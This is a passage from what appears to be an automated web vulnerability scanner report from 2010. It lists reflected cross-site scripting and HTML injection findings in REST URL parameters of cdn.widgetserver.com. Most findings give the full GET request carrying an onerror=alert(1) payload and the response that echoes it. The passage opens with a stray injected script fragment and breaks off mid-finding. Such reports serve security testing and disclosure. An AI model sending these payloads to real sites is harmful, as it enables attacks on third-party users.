<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?408d4"><script>alert(1)</script>25739075e9e=1;adiframe=y">
...[SNIP]...

2.48. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 6584e<img%20src%3da%20onerror%3dalert(1)>08a51aba132 was submitted in the REST URL parameter 14. This input was echoed as 6584e<img src=a onerror=alert(1)>08a51aba132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a6584e<img%20src%3da%20onerror%3dalert(1)>08a51aba132/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:12 GMT
Expires: Sun, 19 Dec 2010 15:00:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 7576
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23ffffff&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fservices
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/eac2065f-95e1-4573-805c-6f32ddae7508.png?13"}],"token":"f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a6584e<img src=a onerror=alert(1)>08a51aba132"});

2.49. http://cdn.widgetserver.com/syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38aea<a>22467d2f7ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/53234a87-ed5a-47ec-859e-f6aaec12e3ce38aea<a>22467d2f7ac/iv/1/p/3/r/eac2065f-95e1-4573-805c-6f32ddae7508/rv/13/t/f64d76295ed0b672ed31ff918b9dafdc2d62f9140000012cecf23a8a/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:52 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1158
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"53234a87-ed5a-47ec-859e-f6aaec12e3ce38aea<a>22467d2f7ac","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

2.50. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 88370<img%20src%3da%20onerror%3dalert(1)>8cad21eecc was submitted in the REST URL parameter 14. This input was echoed as 88370<img src=a onerror=alert(1)>8cad21eecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d588370<img%20src%3da%20onerror%3dalert(1)>8cad21eecc/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:14 GMT
Expires: Sun, 19 Dec 2010 15:00:14 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 7550
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23FFFFFF&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fservices
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/b991680e-982b-4348-83cc-c530351cfdce.jpg?43"}],"token":"c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d588370<img src=a onerror=alert(1)>8cad21eecc"});

2.51. http://cdn.widgetserver.com/syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade0138/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45296<a>dc6117bca29 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/88d52cec-a4e9-4f57-8664-f271aade013845296<a>dc6117bca29/iv/1/p/3/r/b991680e-982b-4348-83cc-c530351cfdce/rv/43/t/c0d6f7a5f457f6b32ad304af9ae46daf72b43e7f0000012ce3e109d5/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:52 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1158
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"88d52cec-a4e9-4f57-8664-f271aade013845296<a>dc6117bca29","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

2.52. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/

Issue detail

The value of REST URL parameter 14 is copied into the HTML document as plain text between tags. The payload 40923<img%20src%3da%20onerror%3dalert(1)>b9cd89d2e8c was submitted in the REST URL parameter 14. This input was echoed as 40923<img src=a onerror=alert(1)>b9cd89d2e8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c40923<img%20src%3da%20onerror%3dalert(1)>b9cd89d2e8c/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
Expires: Sun, 19 Dec 2010 15:00:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Content-Length: 7577
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"enabledState":"0","initParams":"wbx_theme_mod=%23ffffff&wbx_stageHeight=500&wbx_tab_1_default_image=http%3A%2F%2Ffiles.widgetbox.com%2Fservices
...[SNIP]...
s":false,"isAdEnabled":false,"adPlacement":"TL","categories":"","thumbFilePath":"/thumbs/bce84d00-4da9-4b02-b59b-1d59bdf7e168.png?12"}],"token":"1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c40923<img src=a onerror=alert(1)>b9cd89d2e8c"});

2.53. http://cdn.widgetserver.com/syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.widgetserver.com
Path:   /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea475/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 93b0e<a>3573c4fa22e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /syndication/json/i/8fa3ae7e-6c39-4fa0-afc7-39d1d89ea47593b0e<a>3573c4fa22e/iv/1/p/3/r/bce84d00-4da9-4b02-b59b-1d59bdf7e168/rv/12/t/1f59a4c15309195fbf6c02f585b3c55b663f95780000012ce3416e2c/u/3/ HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:49 GMT
Expires: Sun, 7 May 1995 12:00:00 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Pragma: no-cache
Server: Apache/2.2.3 (Red Hat)
Content-Length: 1158
Connection: close

WIDGETBOX.subscriber.Main.onWidgetResponse({"widgets":[{"userPK":"","initParams":"","hasDynamicStyle":false,"appId":"8fa3ae7e-6c39-4fa0-afc7-39d1d89ea47593b0e<a>3573c4fa22e","providerServiceLevel":"","fromPartnerNetworkCode":"","appWidth":"120","appHeight":"120","subscribeMode":"DISABLE_GW","regPK":"","instServiceLevel":"","shortDescr":"","serviceLevel":"","hasDynamicSiz
...[SNIP]...

2.54. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 10 is copied into the HTML document as plain text between tags. The payload 5c64f<img%20src%3da%20onerror%3dalert(1)>4f10f27000f was submitted in the REST URL parameter 10. This input was echoed as 5c64f<img src=a onerror=alert(1)>4f10f27000f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http:5c64f<img%20src%3da%20onerror%3dalert(1)>4f10f27000f//ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:06 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http:5c64f<img src=a onerror=alert(1)>4f10f27000f//ad.doubleclick.net/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platf
...[SNIP]...

2.55. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 11 is copied into the HTML document as plain text between tags. The payload ee675<img%20src%3da%20onerror%3dalert(1)>9295dd52fa7 was submitted in the REST URL parameter 11. This input was echoed as ee675<img src=a onerror=alert(1)>9295dd52fa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.netee675<img%20src%3da%20onerror%3dalert(1)>9295dd52fa7/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:09 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
e3ce","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.netee675<img src=a onerror=alert(1)>9295dd52fa7/clk"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){
...[SNIP]...

2.56. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 12 is copied into the HTML document as plain text between tags. The payload de6bd<img%20src%3da%20onerror%3dalert(1)>79ed0ebf432 was submitted in the REST URL parameter 12. This input was echoed as de6bd<img src=a onerror=alert(1)>79ed0ebf432 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clkde6bd<img%20src%3da%20onerror%3dalert(1)>79ed0ebf432 HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:01:12 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clkde6bd<img src=a onerror=alert(1)>79ed0ebf432"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

2.57. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 220e1<img%20src%3da%20onerror%3dalert(1)>11fe418b31b was submitted in the REST URL parameter 4. This input was echoed as 220e1<img src=a onerror=alert(1)>11fe418b31b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id220e1<img%20src%3da%20onerror%3dalert(1)>11fe418b31b/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
adyCallback, true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"platform":"InsertWidget","id220e1<img src=a onerror=alert(1)>11fe418b31b":"53234a87-ed5a-47ec-859e-f6aaec12e3ce"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.double
...[SNIP]...

2.58. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fd72b<img%20src%3da%20onerror%3dalert(1)>26ee0bd96c1 was submitted in the REST URL parameter 5. This input was echoed as fd72b<img src=a onerror=alert(1)>26ee0bd96c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3cefd72b<img%20src%3da%20onerror%3dalert(1)>26ee0bd96c1/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:51 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
true);
}
};

WIDGETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3cefd72b<img src=a onerror=alert(1)>26ee0bd96c1","platform":"InsertWidget"},

configurationParams : {"wbx_ns_image":"http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png","wbx_ns_link":"http://ad.doubleclick.net/clk
...[SNIP]...

2.59. http://cdn.widgetserver.com/syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http://img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ca147<img%20src%3da%20onerror%3dalert(1)>5a5384338c5 was submitted in the REST URL parameter 6. This input was echoed as ca147<img src=a onerror=alert(1)>5a5384338c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /syndication/platform/InsertWidget/id/53234a87-ed5a-47ec-859e-f6aaec12e3ce/__c__,wbx_ns_image,http:ca147<img%20src%3da%20onerror%3dalert(1)>5a5384338c5//img.widgetbox.com/uploaded/4b6826897bb8645bb2b9fab3dc625b96/ibmbackupm.png,wbx_ns_link,http://ad.doubleclick.net/clk HTTP/1.1
Host: cdn.widgetserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Thu, 16 Dec 2010 15:00:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Length: 17789


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"45670",urls:{runtimeBaseUrl
...[SNIP]...
();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"53234a87-ed5a-47ec-859e-f6aaec12e3ce","platform":"InsertWidget"},

